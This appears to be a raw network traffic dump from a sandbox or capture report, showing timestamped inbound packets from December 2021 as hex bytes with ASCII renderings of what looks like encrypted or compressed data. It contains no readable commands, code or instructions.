                                                                                                                                                        2021-12-28 02:24:00 UTC1206INData Raw: a4 fd 3a 0a 6b a7 32 e4 84 0d 02 ba 28 85 e1 7e 4f b0 30 28 97 61 17 3a 35 f3 dc c1 4a ce a1 b5 ed a4 f8 b5 9a 81 3e df 12 72 42 03 4e 3e 61 ff fb b1 80 00 59 04 25 74 c7 46 a4 e4 54 be 43 3f e4 2b 0c 54 1c 19 5c 94 6c 20 a0 e8 c5 ce ce 5b 6c a1 01 38 e5 97 9b 21 14 71 9f cd 51 9d e6 49 77 80 5b 67 f4 cf 8c 82 0e 3a a1 b3 80 30 13 7c a1 43 35 99 f3 4b e8 d2 26 33 c0 2b cb 35 8a f9 77 ca 54 fc 72 c6 90 11 11 90 65 b9 9d ab 57 7c 6d 32 65 ee c0 c4 2c 88 a0 ab ff b0 f3 d6 59 2c a0 0b 67 58 55 50 11 a2 a6 b1 23 82 51 0b ac 27 22 42 cf 85 45 27 0e 76 d9 c0 5c cb 29 b1 82 51 4f cc b0 f1 8f ec 76 05 8d 57 6f fa ce ae fe 04 96 67 33 39 cf 90 c0 95 01 b8 f4 3e 16 f5 c4 2c 5d 0e f8 75 b6 f3 6b 90 3b 9b 5b c9 cf 3d eb 5c 53 c5 a5 51 22 3f 4b 75 45 d9 18 0f e2 45 4a
                                                                                                                                                        Data Ascii: :k2(~O0(a:5J>rBN>aY%tFTC?+T\l [l8!qQIw[g:0|C5K&3+5wTreW|m2e,Y,gXUP#Q'"BE'v\)QOvWog39>,]uk;[=\SQ"?KuEEJ
                                                                                                                                                        2021-12-28 02:24:00 UTC1207INData Raw: 9f 07 df b9 3a bc ec a0 bb d6 15 84 a4 15 f1 58 35 1a 7b a6 e1 df 1a 5e a6 7b 1e 00 03 1d 16 0a af e0 bd 13 f5 f7 48 40 71 c9 c1 49 8b 63 8b a5 d7 37 e6 db ff 66 46 22 f0 10 8d 50 3b e5 d5 3a e4 11 f8 7f b6 cb 9d c0 4b 9f 93 e7 63 a0 bb e4 3d 36 04 06 ad 8e 70 a9 3c c8 2e bf c4 8f 0e 98 cd 38 09 5a 9e b9 fa 7f 83 7c aa cd d8 59 ca b2 56 84 b4 a3 b0 8d ed d7 62 80 02 24 69 48 1d ed 81 c2 96 3e 99 4a 43 72 6c 10 a4 23 d9 41 ac fd 97 72 96 03 f9 ec 9b d4 dd 95 02 3a bb f7 a1 93 fa 64 3c ed 5e c4 6d 04 4f 0d 11 f8 ad 14 24 69 4d c1 50 10 b3 12 ac 87 eb 7b 96 13 be 8e 5a d8 43 15 80 79 50 39 6a e0 78 b2 65 c6 ca 5e b6 1e 21 32 98 c3 19 a9 41 eb e3 b8 60 b8 10 10 f2 59 e2 80 6d 08 c7 f1 db 15 66 f0 94 18 6d 8b ff 73 c8 9f fa 42 56 b1 3d ad a6 68 81 1c a2 71 89
                                                                                                                                                        Data Ascii: :X5{^{H@qIc7fF"P;:Kc=6p<.8Z|YVb$iH>JCrl#Ar:d<^mO$iMP{ZCyP9jxe^!2A`YmfmsBV=hq
                                                                                                                                                        2021-12-28 02:24:00 UTC1223INData Raw: 1b ee af 9b 86 4b bc b8 6a 72 20 b5 20 21 7f a4 21 52 3f 9a ec 4d 1a d2 a2 72 0b 20 d1 30 0b 6d e6 89 be 9f 10 e7 7d a6 1a db 70 f4 2a b9 8c 67 37 83 84 97 7f 06 14 a3 c4 be 36 ed ca f4 9f 9c b0 22 15 e7 f9 82 fe e4 b4 a5 51 5f f5 98 3e e8 ea 5c 40 ec 2f 70 40 a1 1f 83 7c b5 cc 1a 22 ea 94 03 32 e2 e0 b3 12 25 41 28 86 d8 83 9d 2b 98 13 fa 58 30 e4 5c 1e be 6e f2 ed a1 de bc bf e3 19 d5 19 65 30 41 0b 58 dd 65 81 15 8f a5 09 df d4 e4 d9 9b 63 98 fc 15 03 a8 06 3a b3 07 86 ee 7e 13 e8 24 51 c7 4c ea 63 61 ab 8c 65 1f b6 99 37 88 45 cd 95 ab 3e 98 3f 4f 67 91 54 f1 41 60 1a e6 8e 8e 1e b1 7a 4a f7 ee 34 5c 1e b8 e5 ff 1a 84 59 54 4d 27 28 60 01 e0 df 25 4d 46 09 0e 64 a7 4e be 84 ec 08 40 d3 0b 12 aa 8b f9 f9 c0 45 bb c7 a2 64 96 b3 93 45 60 0d 60 60 a4 22
                                                                                                                                                        Data Ascii: Kjr !!R?Mr 0m}p*g76"Q_>\@/p@|"2%A(+X0\ne0AXec:~$QLcae7E>?OgTA`zJ4\YTM'(`%MFdN@EdE```"
                                                                                                                                                        2021-12-28 02:24:00 UTC1224INData Raw: 70 fd 04 1c 9b 5a 2e e0 6d 85 03 0f 26 e1 76 59 53 4d 87 d8 26 7c 94 98 f8 dc 47 7f ec f4 53 e9 fa ef 6b ab c0 fb 82 05 d0 73 55 8b d9 79 75 5c b1 e5 20 1d b8 fa 09 9e 8b a0 59 89 d6 06 34 1c 47 96 9a bf 5c 67 b0 91 15 c0 a7 84 69 4a c7 a9 d9 83 90 45 db 09 8e 59 33 dd ea 41 d5 c4 98 73 60 c9 1b df 5c 95 ae a9 69 f2 9d 6d ee 75 e7 a8 66 33 d2 77 f8 f3 ec db 37 40 ba 03 7e 1f 97 71 a2 fb 7e 42 f5 02 11 a2 ed 65 e2 6d e0 cc 8a 02 03 a1 17 de a0 93 5f fe 2e f8 87 1d 34 86 3b 4a 59 c6 dd d7 58 48 96 a2 bb 4c ee c6 e1 64 47 54 a3 6e 3f a3 aa e5 a7 e7 17 f1 c0 10 60 67 17 6c 15 32 94 6a d1 03 15 6b 26 b3 5b 73 1d d6 10 06 b1 b4 1d 81 c5 07 46 78 f6 7e f1 88 ae 70 db 60 00 c9 51 c5 b9 bd a2 77 83 23 b2 16 3d 20 31 d4 ae 4c c8 c9 4e a4 86 aa ec 31 b4 45 f5 9c 31
                                                                                                                                                        Data Ascii: pZ.m&vYSM&|GSksUyu\ Y4G\giJEY3As`\imuf3w7@~q~Bem_.4;JYXHLdGTn?`gl2jk&[sFx~p`Qw#= 1LN1E1
                                                                                                                                                        2021-12-28 02:24:00 UTC1240INData Raw: c2 e2 7e 7d aa 8a a0 65 ae ba cf 26 7d 6c 37 c7 99 7f 4b 8d 16 44 18 31 ad 97 6a 70 0f 21 ec 8d 43 b5 80 31 a7 61 fb 73 cf 62 11 35 06 01 7d fd 59 b1 af 24 eb d8 07 c6 0c 51 d6 a7 bd 09 79 a2 ac 62 39 68 99 f1 46 26 eb 60 53 b2 85 d3 db 0f 76 40 f8 3f 7d bf df e5 a8 dd f2 a1 18 ee 9c 4c 99 c4 8d 2e c2 cc 52 fa 70 57 0e 9a 6d f0 7e 89 f6 61 ad 66 2c 2e 30 5e da 7b 07 bc a2 e2 78 65 69 a0 9c 81 b8 64 d6 f2 08 0c 30 db fa 39 d5 ae ae 2a e5 b6 a4 a3 4c 99 e9 86 2b 1a 03 68 c2 77 2a a0 7c c2 49 dc e7 46 1e cf 36 17 e2 9a 5d f2 26 c1 44 37 d7 b3 a9 9d 10 94 be d9 ae da f7 88 d2 f7 1f 3a 90 34 f4 fb bf b0 86 fe e4 56 3e 7e 88 57 93 73 72 bb 2d ab 79 17 f5 53 d3 9a dc bf 7b d3 17 98 07 c8 70 04 55 22 dc a1 86 9e 97 45 8a 1a 3e ad b0 54 dc c7 02 33 d3 cd 60 25 f4
                                                                                                                                                        Data Ascii: ~}e&}l7KD1jp!C1asb5}Y$Qyb9hF&`Sv@?}L.RpWm~af,.0^{xeid09*L+hw*|IF6]&D7:4V>~Wsr-yS{pU"E>T3`%
                                                                                                                                                        2021-12-28 02:24:00 UTC1241INData Raw: bc 09 c7 0f 1b 99 1c 26 5d c3 9e 84 83 73 92 cf a5 30 f2 a6 3f 56 f6 6e 44 9d fc 49 16 8a 0f de 3a e5 3a 52 6c e9 2a f9 f6 41 cc 4b f8 01 f2 9f 14 71 0f f4 01 f7 09 dd 2b dd 54 e3 cb ac 60 c5 20 0f d8 36 a5 61 6f 5f 9b ca e3 69 a0 5f f4 9e 51 91 b5 65 5a 40 7d dd 62 d4 85 da f7 ca 3b dd f4 7b 16 d6 be 33 45 0e 6f bc 6e 1a d9 4a 2e 55 78 c3 b9 88 56 85 87 55 7c 5a 7c 15 54 88 17 ab bc f2 71 d2 b0 7b a5 c5 b3 29 3e a1 f4 a7 08 14 59 29 0f 84 6e 73 19 dc 4f 77 c8 bb 60 89 a7 62 83 06 61 1a f5 7d 17 0e 13 bc 84 91 23 da 37 74 80 91 bf 01 99 b8 7e df c6 11 08 46 db 7a 6b ae ad d6 6e aa c6 14 c5 8e b3 35 17 83 70 61 a5 45 a7 90 df a0 f1 3f fe 90 77 1a cc 84 88 35 5e df cc 5a ba 39 b5 bb ab ea e3 ed ae 80 06 f5 2a 83 d1 74 39 75 89 2e 07 87 17 66 5c f7 ac 58 d5
                                                                                                                                                        Data Ascii: &]s0?VnDI::Rl*AKq+T` 6ao_i_QeZ@}b;{3EonJ.UxVU|Z|Tq{)>Y)nsOw`ba}#7t~Fzkn5paE?w5^Z9*t9u.f\X
                                                                                                                                                        2021-12-28 02:24:00 UTC1257INData Raw: fa 5f 7e 57 e5 1f eb 4b a0 1e 72 e5 2c aa de 56 9c a4 d9 1e 9f 65 eb 0b 71 85 b7 86 81 cc ed 3e 0c 74 f4 8a 03 e0 ca 49 35 35 b4 0e 57 22 c7 24 e2 3c 0f 9c 8e ab 09 b8 55 b8 a1 50 72 d2 6a 24 0c 52 d1 2b c7 18 c8 82 e0 bb 41 30 94 3e d5 f9 2a 5d 58 24 41 28 bd 1b 39 55 15 fe db 96 c0 cd 48 87 b2 c6 45 8e 36 3c a3 49 5a 86 ed 33 cf e5 20 7d 7c e0 28 ab 66 60 96 3f 2a e6 0b 26 2f 45 b3 8c f6 53 4d c6 3d cb cf 73 12 09 fb a5 9c 66 c7 b4 d2 d7 66 7f 74 68 2a 48 08 8c b9 fd 86 a4 a3 55 2a 96 3f b8 05 7d e8 9f 9a 11 88 0c b8 c5 18 7d bd 78 21 f8 89 9a 72 e5 82 92 e4 7d e5 e9 ce 57 63 c9 06 cb 9e 91 ab df 93 6f 7c 7d 12 da ed a4 ae 1a f7 77 ff 3a 52 8b 93 44 ca e8 a6 a8 05 9a c6 cb 70 ae dc 62 dc ff 84 c5 4f 36 63 a9 3c 4f 02 86 11 66 35 e5 dd 68 b9 2e 4e b4 db
                                                                                                                                                        Data Ascii: _~WKr,Veq>tI55W"$<UPrj$R+A0>*]X$A(9UHE6<IZ3 }|(f`?*&/ESM=sffth*HU*?}}x!r}Wco|}w:RDpbO6c<Of5h.N
                                                                                                                                                        2021-12-28 02:24:00 UTC1258INData Raw: ab 4e 0b e0 b7 c5 b4 0e 56 81 b1 0b ee 69 91 30 3d 97 06 3e 52 9b d5 21 e7 2f 02 00 7e 54 b3 35 f0 0b 43 5e 69 68 c0 63 a0 e7 7a ae b6 d6 1f 2b 95 94 83 76 75 6f df 3e e2 e9 fe ed 64 9a 2b fb 27 88 d2 10 31 3f a8 4e f8 d8 cf 61 a5 be db 3d 34 ae bb de f6 3a 01 c7 09 18 68 af d2 7d a1 ee a2 2d b2 3b fe db 18 5e aa 98 d7 10 c2 06 0f 9e c4 f1 99 ed 2f 66 0d 91 b6 0e 64 27 49 e7 02 d6 fd 42 6c 6c a0 60 0f f6 5b a1 64 47 29 e0 b8 a1 9b 9c 83 b9 8c 6a 76 f1 1b a2 18 0a d8 d9 43 ae dc 12 d9 76 4c 67 6e 9d a4 6c 10 a9 45 f8 9f 88 2b 59 0d ad b6 94 ad c6 ee 0d 66 6b cb e3 1a 42 ed 84 df 7c c6 ca 8a 33 11 77 b7 34 ad e5 77 b6 1e 73 9b 4f 74 fa 47 c1 24 1d 85 ec a2 81 9d 45 82 a6 08 e5 a7 93 14 f4 ff 1a 03 ee 81 db 71 45 9a 19 08 35 65 3c fc 3f d7 d2 1e 4a 78 87 95
                                                                                                                                                        Data Ascii: NVi0=>R!/~T5C^ihcz+vuo>d+'1?Na=4:h}-;^/fd'IBll`[dG)jvCvLgnlE+YfkB|3w4wsOtG$EqE5e<?Jx
                                                                                                                                                        2021-12-28 02:24:00 UTC1274INData Raw: d2 44 c2 41 ba 8c 21 71 ed ed 60 bc da ae 3f bd 2f 33 a7 03 00 fa 85 e9 97 f0 d2 7c 7b 10 79 b1 78 d6 85 93 b2 de f1 8a 66 5e 0a 40 3e 97 66 af 56 e0 1a c0 7f ee 0c 12 26 3a 44 1a cb 60 b4 4a 59 de f7 7a b7 f8 25 91 d6 c1 bd 1a d1 77 46 96 49 e0 4b e2 ee 41 bb b2 71 e3 0b 62 3a ea a9 b5 40 cc 49 03 0a 59 f0 38 bf c9 76 6a 9a b0 43 92 54 14 1d d2 dc 6e 8d df 36 cf 00 59 5e 59 17 cc 93 74 d8 33 8b 49 47 a8 d6 6c 1b 7e e9 e6 0a 5c 44 2e 6f ca 80 18 6e 1e 4f 3c 17 a8 69 99 64 e0 8a 8c 3c c5 48 c2 13 25 ee 9e ec 80 38 87 67 c7 ba 16 21 77 7c fc b5 75 02 de 8d 8a 13 1d cf 85 f4 f3 77 6b 15 09 a2 0e b9 fb 8d 40 86 f7 6d 99 24 de d9 e3 76 96 e1 4b 1c 68 07 f8 f0 83 a4 2e 1d 10 b4 9e 42 e5 89 ad 3d f4 5e 71 96 ad da 7c 99 a5 b9 bc 3b a6 95 32 7a f3 5a a7 96 7e 89
                                                                                                                                                        Data Ascii: DA!q`?/3|{yxf^@>fV&:D`JYz%wFIKAqb:@IY8vjCTn6Y^Yt3IGl~\D.onO<id<H%8g!w|uwk@m$vKh.B=^q|;2zZ~
                                                                                                                                                        2021-12-28 02:24:00 UTC1275INData Raw: d0 2d 87 83 de 6a 2a e4 0c 03 64 df ab 28 2e 13 3d e3 fe 37 80 6d 93 87 82 be 2d 75 6b 4e 5e cf 35 f4 be e2 34 f8 07 22 85 c7 75 df 58 70 20 df 13 85 86 ac a1 ad 70 20 55 b8 15 55 a7 49 99 57 6b 61 1d fe 45 e7 3e 3c d0 0c a3 d2 37 2a 83 a1 a7 5c a4 60 e5 f8 40 dd e4 39 36 e4 b6 97 91 b6 8e bb 0a d8 9c 7b 0c 50 49 c1 6e 01 1e 5d 1b f5 72 26 00 27 f4 d1 7d d5 a4 18 28 d3 2a bb c7 39 22 65 da 9e 17 62 95 93 47 c2 ca 42 d4 d3 bc 7c 24 6c 1a f7 ca cb 54 ae ec a5 e3 f4 ac 5b b5 37 5b 59 56 ba a7 7d 40 fd 86 d0 1e fa 02 d3 ed b2 33 b4 5b 15 ed e6 41 f9 83 3a 66 ea 19 9a 5e 57 8b 77 b8 01 13 71 84 cc 96 a5 71 9f 71 7c 38 4b 42 fa 64 18 d8 02 44 d5 9b a1 92 8a 4a 54 a0 c0 0f 9b 55 f2 8f 28 6b 10 d4 7e d0 64 7a 90 63 3e 6d fb f1 73 db e5 cc 7a d3 de 03 5f ad 56 d8
                                                                                                                                                        Data Ascii: -j*d(.=7m-ukN^54"uXp p UUIWkaE><7*\`@96{PIn]r&'}(*9"ebGB|$lT[7[YV}@3[A:f^Wwqqq|8KBdDJTU(k~dzc>msz_V
                                                                                                                                                        2021-12-28 02:24:00 UTC1291INData Raw: 64 ae 6a 06 2a b6 7d 86 29 6e e4 71 41 44 f1 c0 c7 28 05 55 02 56 fc 07 e0 d5 72 b1 33 6b a3 24 a8 9f e7 27 1c 99 1a 0e a7 56 62 e1 ce ee e7 02 32 b1 28 de ba a7 2f 62 24 db bf 67 14 3d 74 72 f4 c0 c1 b6 03 45 77 85 4a 6c 4d 51 8e 31 be 7b fc 4f 35 bf 25 e9 3b 61 5c d9 a0 9c 12 4c 3a 0d 8e 8b aa 1a 06 01 f1 4b 70 b6 ea ad c9 90 6d 7e a7 ca 0a 02 46 ca df 92 e4 2b 82 c9 1d 14 52 cc da b3 3e 7a 5f 71 bc a4 21 aa fe f1 a6 3f ac 11 db 74 f0 67 4f fd fc e6 e3 0f 37 2c d8 b4 41 a1 ee 9e 79 0f 69 8a 59 7d 40 5a b8 e1 76 b3 31 85 bb 11 6c 05 cf 27 c6 3f 1f f4 95 bf 88 ea 3d bc e8 c8 88 5d d4 7e 0a 72 7f 34 a5 42 6c c5 03 26 10 cd 0c 7f 90 9c d4 6d db 5b 7f df 67 e3 6b f4 0c 96 d5 db c1 57 d5 54 ca 47 0d db be 97 27 93 d3 32 7d 99 76 20 f2 2f 66 46 4f 61 29 84 78
                                                                                                                                                        Data Ascii: dj*})nqAD(UVr3k$'Vb2(/b$g=trEwJlMQ1{O5%;a\L:Kpm~F+R>z_q!?tgO7,AyiY}@Zv1l'?=]~r4Bl&m[gkWTG'2}v /fFOa)x
                                                                                                                                                        2021-12-28 02:24:00 UTC1292INData Raw: 93 a1 d9 bc 89 02 41 38 c5 e9 6c 9b 5c 8d 1c 24 69 db 96 b4 18 89 49 f3 38 24 ca c0 a8 16 fd 02 be 5f 0e 81 c9 db 5f 2e dd ea 0a 27 7c b6 73 fd e6 47 06 f9 38 06 3e 4f 3e a1 c9 0d cb 1c c4 2a c5 72 8d cf aa 87 ad 0f 0f 75 5f 5b 5e 72 82 38 2f c3 c6 7a 5f 73 63 59 07 99 b2 d5 32 dc 96 b6 cf 82 8b e5 b2 e7 e2 39 3b 4d 24 85 5e 85 4e 7f d3 52 ac 7b b6 2c 91 b1 a3 39 66 b3 f6 85 2a 5f e5 7f 9e b3 06 c1 2f 06 17 7e ea 9f 35 9e e4 62 4b 64 37 2f 38 8b 28 0e 51 7c 5f be ae c8 fa 0d 9b 5a d6 d7 6e e9 69 0e 6e 81 e6 59 66 44 ae 77 6c e5 4a 53 0e 8d 2b fd 39 2c e5 e5 2c 79 38 7b 3d 6f 84 4e fd 5f 1f ce e2 36 e9 9b 48 64 68 0c 3c 8c e7 71 54 03 7c b6 49 36 34 63 51 a1 38 00 05 c1 09 f1 62 b6 88 f3 e2 ec b9 96 1b a3 fb 88 37 b3 56 67 c3 56 ff 98 2e bd fc 57 15 5a 2e
                                                                                                                                                        Data Ascii: A8l\$iI8$__.'|sG8>O>*ru_[^r8/z_scY29;M$^NR{,9f*_/~5bKd7/8(Q|_ZninYfDwlJS+9,,y8{=oN_6Hdh<qT|I64cQ8b7VgV.WZ.
                                                                                                                                                        2021-12-28 02:24:00 UTC1308INData Raw: 69 d6 6e 34 05 dc d0 fd 39 9a b0 8c 99 48 a4 b3 4c 71 9b 85 98 86 89 1c 72 81 bc 60 06 8f 9f 6d 9d 55 ee 6b b9 d1 62 a8 f8 c2 0f b4 f5 56 de 14 68 5c 30 86 a6 ad 33 63 f4 71 0f 55 4d 0e e6 26 26 c8 2d 6f 27 6f e4 8e 83 30 77 17 3f 5c 72 11 21 b1 b7 f3 69 87 d9 28 71 b1 f9 0d da 7b 76 f4 d0 ce 27 ab a7 30 96 9a 90 73 82 7e e8 06 9b bb 32 5a 95 1c 85 68 a6 f7 16 2b d1 c7 9b 47 e7 a4 5c e3 04 6f d4 88 96 78 9a 4c 29 9f b1 46 41 2d bc 70 f4 a8 eb dd e6 0f aa c2 fa 5a 41 71 74 90 71 d9 62 8b 01 eb 42 39 a7 66 71 82 f9 4a 88 d0 a4 af bb bd 9e 90 a8 cd f6 f5 a0 97 98 0a 49 88 5b aa 59 65 82 c8 4e 0d 4f ba d6 19 70 6f 6c e3 3c 08 3b ba aa a8 bc a6 cd 60 f8 c6 2b f6 b1 dd 4a 2a 12 b5 dc 77 a0 f1 47 28 c4 94 7a 2e 75 be 2e cd 4c 83 0a 5a 1a a4 e7 81 19 cb bb 3d 89
                                                                                                                                                        Data Ascii: in49HLqr`mUkbVh\03cqUM&&-o'o0w?\r!i(q{v'0s~2Zh+G\oxL)FA-pZAqtqbB9fqJI[YeNOpol<;`+J*wG(z.u.LZ=
                                                                                                                                                        2021-12-28 02:24:00 UTC1309INData Raw: db 68 9d 4c 4f be 37 ef 7c b1 e4 ed 73 71 af 72 9f f8 d3 7c 87 92 21 66 04 a6 34 90 5d 97 3d 70 1b 93 27 61 53 1d 34 9c eb 8c 50 55 88 89 1f e0 f8 58 6b 29 bb 03 a6 e0 6d bb 74 93 96 18 e6 9d b9 de 53 a0 26 0b f2 45 91 58 91 ec 5a 77 ae 07 d0 0c 32 a3 c6 5b 63 67 67 96 7c 5e 4c 45 5a 1e af b7 80 3e f2 93 cc b1 5c 8b 4e 94 bf 27 e0 9f 03 07 7e 4b fb 35 7c 1f 1e df 0f cc 4c a1 49 d2 07 6d 93 55 39 3e fe 57 c2 80 7c ec e0 de 9d 66 43 26 fc 1c 7b 2d d7 b8 b2 43 f4 71 66 16 cc f2 24 53 0c ef 83 52 d2 bf 79 17 12 f7 9c 01 f6 76 91 88 2f a6 dd ab 4b 32 a1 28 2b 6b 3b bd d4 01 f9 1d 88 79 97 e9 6d cb 9e 45 92 31 16 43 03 96 69 69 ec b4 37 df 70 5d 88 40 cc 08 b6 9c dc fc 8f 5a 31 43 69 22 02 b4 7d 17 3f f4 ac 11 e2 ac 2c 5c bf 53 ea b0 b5 91 6c b9 93 f9 d9 d2 5f
                                                                                                                                                        Data Ascii: hLO7|sqr|!f4]=p'aS4PUXk)mtS&EXZw2[cgg|^LEZ>\N'~K5|LImU9>W|fC&{-Cqf$SRyv/K2(+k;ymE1Cii7p]@Z1Ci"}?,\Sl_
                                                                                                                                                        2021-12-28 02:24:00 UTC1325INData Raw: 89 46 38 e6 fe 82 f3 f4 f5 7a 0c aa a7 6f 8a e3 dc 69 b4 e0 b0 8e 6d 52 63 6a 94 97 c9 41 31 ae a8 07 fe d3 f2 96 81 e4 31 0f 3b 15 3e a8 30 a1 44 28 44 cb 55 81 20 92 5b fc e6 94 39 bf b6 44 3e bc 75 33 46 2d 38 dd a4 62 26 d1 66 f8 e1 f6 ef 46 ad be 54 72 bd eb 94 20 a3 c8 1e 4c 64 6d 8c 4d 4d ec 82 c2 6d 33 3d 69 79 26 7a ef 16 54 ea 48 8a 09 31 ae 49 fc f2 15 7c 82 53 c0 0d d1 d2 8e b3 c1 d5 6b ff e7 27 d0 c4 85 86 0d 4b 12 f5 d2 36 55 d2 2c 8c 0e 85 15 2c ad d9 bc 30 3a e3 97 31 29 7c 92 0f 15 66 15 53 05 ae f4 82 39 95 c1 ce 37 a0 70 43 21 3a f0 9b de ba 61 c2 5e 5e 43 15 0a 8a d9 f7 b5 68 cf d8 c5 22 4d 56 e9 98 a8 72 3d 70 ab 78 9f 56 dc 89 72 3e 18 2a 1a 2b d6 2d 77 d4 16 34 e6 cd db 6e 12 23 41 b1 3b 90 63 b9 93 b7 b3 e1 a9 e4 4d f2 de ad b5 31
                                                                                                                                                        Data Ascii: F8zoimRcjA11;>0D(DU [9D>u3F-8b&fFTr LdmMMm3=iy&zTH1I|Sk'K6U,,0:1)|fS97pC!:a^^Ch"MVr=pxVr>*+-w4n#A;cM1
                                                                                                                                                        2021-12-28 02:24:00 UTC1326INData Raw: 59 63 4b 96 5d df a8 6d 77 16 7f ca 8b d8 e0 ce 30 ee af b8 16 f8 37 f3 bf de c7 31 d2 6b c1 d0 5b 50 bf bd a1 d9 c8 78 8e a2 07 8b 7f ea 91 0f fc 6f da c1 5a 66 71 8b 81 64 24 c6 0b 4f 28 31 bd 42 ca d4 1b 3e 08 ec d9 9a 4f cb d5 2b 21 f2 9c 2a a8 42 f2 f0 4f 92 cc e4 1e 9b 95 59 b8 d3 36 a3 e3 84 47 49 d0 2a a2 a3 b0 ea 9a 54 17 d8 f3 22 90 fe ed 56 f3 1d 32 0c 0d a3 a8 f2 82 b9 db 58 f3 53 9c c4 06 91 fd a7 04 0c 66 05 fd 29 40 bc dd 66 8b 2f dd 75 33 65 c6 2d e7 0d b7 ef b6 10 01 84 5f 74 bb cd c0 d1 5c 99 50 de ad 44 1c 06 2b af be 54 27 99 d9 c2 50 4e cd 2c 2e 41 d0 8e 9e fc b6 b8 87 77 8e 41 67 f1 2a e6 30 78 b2 61 06 8e b1 bf d8 70 22 a0 8c ee 92 75 35 c8 07 ae ba 1f 9f 13 d6 6a c0 49 07 35 9a 35 09 88 96 5d a3 67 4e 88 b9 70 9b 4a bf 60 95 f0 ad
                                                                                                                                                        Data Ascii: YcK]mw071k[PxoZfqd$O(1B>O+!*BOY6GI*T"V2XSf)@f/u3e-_t\PD+T'PN,.AwAg*0xap"u5jI55]gNpJ`
                                                                                                                                                        2021-12-28 02:24:00 UTC1342INData Raw: d7 d8 fe 93 ba 5b 9f c7 21 b9 2b d2 70 a3 20 db e4 ae 0f d8 07 4f 5f a3 71 05 a0 7e cc 76 b6 16 08 90 67 d0 11 b9 a0 82 48 67 12 f3 d1 62 6a 39 d3 cb 6f e8 74 43 48 d2 0d eb b8 e8 3a 6a 2f e5 ca 0f 6a 11 c7 9e 84 32 63 7e e6 d0 6d fb b2 53 95 3b ec a7 a8 55 ff 05 a0 09 67 a3 8e f6 81 a0 59 93 8c 50 32 f9 21 6d c0 ef 17 ba 03 ee 2a df 19 94 5c c7 ab a8 b7 af 85 8f 10 6c b4 88 6d f5 e4 a2 07 f2 91 2c c4 28 c9 8a 12 98 38 e8 f9 32 37 17 83 21 3c 75 5c d1 d3 64 b1 7e 75 05 dc d5 9b 40 30 7b 9a 2c 87 ea c1 f1 c3 3b d6 ef 7f ef 4d 9e e6 88 d7 f0 04 ee 13 3a 65 a2 23 68 fd fb 0e 11 a4 ee a7 d6 96 8b 29 ae 7a 61 b6 b7 c2 73 b9 d7 c2 d4 d6 81 bd e2 af 36 f1 5d 5c 4d 05 2d 9d 55 4c f4 a9 4f ae 7e 08 04 e3 33 2e 8b c3 86 11 9d ed ce 22 78 c2 69 e2 17 b5 63 e2 ab 7f
                                                                                                                                                        Data Ascii: [!+p O_q~vgHgbj9otCH:j/j2c~mS;UgYP2!m*\lm,(827!<u\d~u@0{,;M:e#h)zas6]\M-ULO~3."xic
                                                                                                                                                        2021-12-28 02:24:00 UTC1343INData Raw: 76 5a bd 31 13 fe ab 83 6e 8d f5 26 40 12 80 18 78 01 12 cf bb c0 7a 38 84 ed 88 ad 45 74 39 25 86 5b cd 6e e0 ca 4f 32 aa 65 5d dd e3 73 1c 29 26 b6 f2 f9 78 dc 1a ae 71 fd 16 3b 50 d1 ad fa e9 cd 21 19 4f 9a 82 90 90 ef b3 0a b7 5c af c6 42 c7 74 75 57 b4 34 84 14 38 0f 54 29 20 87 d1 f0 2e a5 11 22 d9 94 47 c7 f3 bb a7 61 52 bd f9 5e e5 27 45 7e 21 d2 44 82 4e fe ac 36 9a 4a c8 c2 71 57 bc 2c f2 bf 64 df 52 54 51 85 28 86 27 1d 24 11 c7 93 05 8d 82 c2 07 37 36 92 8e d2 8c e9 30 19 7d 10 db 1a 3f 93 42 82 b7 c3 eb 62 23 ec 35 ca 24 44 bd 61 39 bb 8c 72 00 cb c5 06 06 cf 05 56 85 1a b3 1e 6a 0a fa 1d 93 33 bd d4 ab e5 3a 0b 55 ef 5a 04 f4 a6 70 b7 fb e3 a8 4a b3 5e 34 5d 4b ce f8 29 9e 31 19 2b 76 59 42 aa bd d7 99 7b dc 40 48 37 b4 12 69 a0 52 b0 e9 97
                                                                                                                                                        Data Ascii: vZ1n&@xz8Et9%[nO2e]s)&xq;P!O\BtuW48T) ."GaR^'E~!DN6JqW,dRTQ('$760}?Bb#5$Da9rVj3:UZpJ^4]K)1+vYB{@H7iR
                                                                                                                                                        2021-12-28 02:24:00 UTC1359INData Raw: 34 14 3c 52 2b d4 15 fb ad ee ff 51 0d dc ac db b5 9f 79 9f 43 07 1f f5 ca 74 ea 12 21 5d 44 a5 62 9f 82 1b 84 f9 35 3d 99 4d 10 db e6 31 bb 35 c6 c8 6b df 39 27 75 b3 52 0e 14 04 b0 d5 52 3b c4 e0 c4 d0 43 e8 4b 14 63 e0 50 23 38 c3 a5 b1 55 6b 88 bf f3 f1 31 19 89 34 ab b8 87 8e e0 cb 4f 3f 4a 83 89 32 d4 81 08 c5 39 6f 04 63 21 e9 cf 9d ae a8 04 6e 20 70 97 3e 69 40 ca 9e f7 e7 5f 0a 37 9f 79 9d a3 16 19 8d 52 c6 82 78 20 61 50 5a 88 2e 04 da 97 17 be 00 65 89 39 76 d4 cf bb 8f 7b 38 02 4f 21 e4 a2 24 f4 7f de bc 15 c2 e7 50 58 7a a6 b6 f9 d2 e8 27 9a b9 b1 78 59 e8 fc 21 b6 05 86 98 33 6c c7 5f d2 67 10 63 5e 1a fb 60 9a 21 c9 4b f5 d1 3b dd a6 5f 37 f0 a0 80 78 83 4b c1 56 43 ed 98 68 e7 be e4 31 da a4 b3 18 72 07 fe fe 54 3e da 7c 91 fb 1f b8 1a 99
                                                                                                                                                        Data Ascii: 4<R+QyCt!]Db5=M15k9'uRR;CKcP#8Uk14O?J29oc!n p>i@_7yRx aPZ.e9v{8O!$PXz'xY!3l_gc^`!K;_7xKVCh1rT>|
